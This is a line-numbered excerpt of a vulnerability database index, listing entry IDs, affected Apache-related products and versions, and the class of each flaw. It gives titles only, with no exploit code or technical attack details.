4320| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
4321| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
4322| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
4323| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
4324| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
4325| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
4326| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
4327| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
4328| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
4329| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
4330| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
4331| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
4332| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
4333| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
4334| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
4335| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
4336| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
4337| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
4338| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
4339| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
4340| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
4341| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
4342| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
4343| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
4344| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
4345| [103690] Apache OpenMeetings 1.0.0 sql injection
4346| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
4347| [103688] Apache OpenMeetings 1.0.0 weak encryption
4348| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
4349| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
4350| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
4351| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
4352| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
4353| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
4354| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
4355| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
4356| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
4357| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
4358| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
4359| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
4360| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
4361| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
4362| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
4363| [103352] Apache Solr Node weak authentication
4364| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
4365| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
4366| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
4367| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
4368| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
4369| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
4370| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
4371| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
4372| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
4373| [102536] Apache Ranger up to 0.6 Stored cross site scripting
4374| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
4375| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
4376| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
4377| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
4378| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
4379| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
4380| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
4381| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
4382| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
4383| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
4384| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
4385| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
4386| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
4387| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
4388| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
4389| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
4390| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
4391| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
4392| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
4393| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
4394| [99937] Apache Batik up to 1.8 privilege escalation
4395| [99936] Apache FOP up to 2.1 privilege escalation
4396| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
4397| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
4398| [99930] Apache Traffic Server up to 6.2.0 denial of service
4399| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
4400| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
4401| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
4402| [117569] Apache Hadoop up to 2.7.3 privilege escalation
4403| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
4404| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
4405| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
4406| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
4407| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
4408| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
4409| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
4410| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
4411| [99014] Apache Camel Jackson/JacksonXML privilege escalation
4412| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4413| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
4414| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4415| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
4416| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
4417| [98605] Apple macOS up to 10.12.3 Apache denial of service
4418| [98604] Apple macOS up to 10.12.3 Apache denial of service
4419| [98603] Apple macOS up to 10.12.3 Apache denial of service
4420| [98602] Apple macOS up to 10.12.3 Apache denial of service
4421| [98601] Apple macOS up to 10.12.3 Apache denial of service
4422| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
4423| [98405] Apache Hadoop up to 0.23.10 privilege escalation
4424| [98199] Apache Camel Validation XML External Entity
4425| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
4426| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
4427| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
4428| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
4429| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
4430| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
4431| [97081] Apache Tomcat HTTPS Request denial of service
4432| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
4433| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
4434| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
4435| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
4436| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
4437| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
4438| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
4439| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
4440| [95311] Apache Storm UI Daemon privilege escalation
4441| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
4442| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
4443| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
4444| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
4445| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
4446| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
4447| [94540] Apache Tika 1.9 tika-server File information disclosure
4448| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
4449| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
4450| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
4451| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
4452| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
4453| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
4454| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4455| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4456| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
4457| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
4458| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
4459| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
4460| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
4461| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
4462| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4463| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4464| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
4465| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
4466| [93532] Apache Commons Collections Library Java privilege escalation
4467| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
4468| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
4469| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
4470| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
4471| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
4472| [93098] Apache Commons FileUpload privilege escalation
4473| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
4474| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
4475| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
4476| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
4477| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
4478| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
4479| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
4480| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
4481| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
4482| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
4483| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
4484| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
4485| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
4486| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
4487| [92549] Apache Tomcat on Red Hat privilege escalation
4488| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
4489| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
4490| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
4491| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
4492| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
4493| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
4494| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
4495| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
4496| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
4497| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
4498| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
4499| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
4500| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
4501| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
4502| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
4503| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
4504| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
4505| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
4506| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
4507| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
4508| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
4509| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
4510| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
4511| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
4512| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
4513| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
4514| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
4515| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
4516| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
4517| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
4518| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
4519| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
4520| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
4521| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
4522| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
4523| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
4524| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
4525| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
4526| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
4527| [90263] Apache Archiva Header denial of service
4528| [90262] Apache Archiva Deserialize privilege escalation
4529| [90261] Apache Archiva XML DTD Connection privilege escalation
4530| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
4531| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4532| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
4533| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
4534| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4535| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4536| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
4537| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
4538| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
4539| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
4540| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
4541| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
4542| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
4543| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
4544| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
4545| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
4546| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
4547| [87765] Apache James Server 2.3.2 Command privilege escalation
4548| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
4549| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
4550| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
4551| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
4552| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
4553| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
4554| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
4555| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
4556| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
4557| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4558| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4559| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
4560| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
4561| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
4562| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4563| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
4564| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
4565| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
4566| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
4567| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
4568| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
4569| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
4570| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
4571| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
4572| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
4573| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
4574| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
4575| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
4576| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
4577| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
4578| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
4579| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
4580| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
4581| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
4582| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
4583| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
4584| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
4585| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
4586| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
4587| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
4588| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
4589| [82076] Apache Ranger up to 0.5.1 privilege escalation
4590| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
4591| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
4592| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
4593| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
4594| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
4595| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
4596| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
4597| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
4598| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
4599| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
4600| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
4601| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
4602| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
4603| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
4604| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
4605| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
4606| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
4607| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
4608| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
4609| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
4610| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
4611| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
4612| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
4613| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
4614| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
4615| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
4616| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
4617| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
4618| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
4619| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
4620| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
4621| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
4622| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
4623| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
4624| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
4625| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
4626| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
4627| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
4628| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
4629| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
4630| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
4631| [79791] Cisco Products Apache Commons Collections Library privilege escalation
4632| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
4633| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
4634| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
4635| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
4636| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
4637| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
4638| [78989] Apache Ambari up to 2.1.1 Open Redirect
4639| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
4640| [78987] Apache Ambari up to 2.0.x cross site scripting
4641| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
4642| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
4643| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
4644| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4645| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4646| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4647| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4648| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
4649| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
4650| [77406] Apache Flex BlazeDS AMF Message XML External Entity
4651| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
4652| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
4653| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
4654| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
4655| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
4656| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
4657| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
4658| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
4659| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
4660| [76567] Apache Struts 2.3.20 unknown vulnerability
4661| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
4662| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
4663| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
4664| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
4665| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
4666| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
4667| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
4668| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
4669| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
4670| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
4671| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
4672| [74793] Apache Tomcat File Upload denial of service
4673| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
4674| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
